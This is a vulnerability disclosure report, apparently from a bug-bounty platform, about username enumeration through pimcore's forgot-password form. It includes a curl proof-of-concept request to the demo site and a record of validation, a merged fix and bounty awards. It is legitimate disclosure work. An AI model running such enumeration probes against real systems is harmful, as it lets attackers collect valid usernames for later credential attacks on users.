Observable Response Discrepancy in pimcore/pimcore

Valid

Reported on

Aug 31st 2021


✍️ Description

It is possible to enumerate usernames via the forgot password functionality

🕵️‍♂️ Proof of Concept

When entering an username that is not registered in the application the response reads "User unknown". The following curl command demonstrates this:

curl -i -s -k -X $'POST' \
    -H $'Host: demo.pimcore.fun' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://demo.pimcore.fun/admin/login/lostpassword' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 82' -H $'Origin: https://demo.pimcore.fun' -H $'Dnt: 1' -H $'Upgrade-Insecure-Requests: 1' -H $'Te: trailers' -H $'Connection: close' \
    -b $'PHPSESSID=6f1c18e8cc8503830b327897c8fb8678' \
    --data-binary $'username=RandomUsername&csrfToken=a1b983212b46f65236f802e94253af4dc2d6320e&submit=' \
    $'https://demo.pimcore.fun/admin/login/lostpassword'

💥 Impact

It is possible to enumerate usernames of registered users in the application. An attacker can then chain this information with other attacks.

We have contacted a member of the pimcore team and are waiting to hear back 3 months ago
We have contacted a member of the pimcore team and are waiting to hear back 3 months ago
Bernhard Rusch validated this vulnerability 3 months ago
Nuno Lopes has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch confirmed that a fix has been merged on d0a4de 3 months ago
Bernhard Rusch has been awarded the fix bounty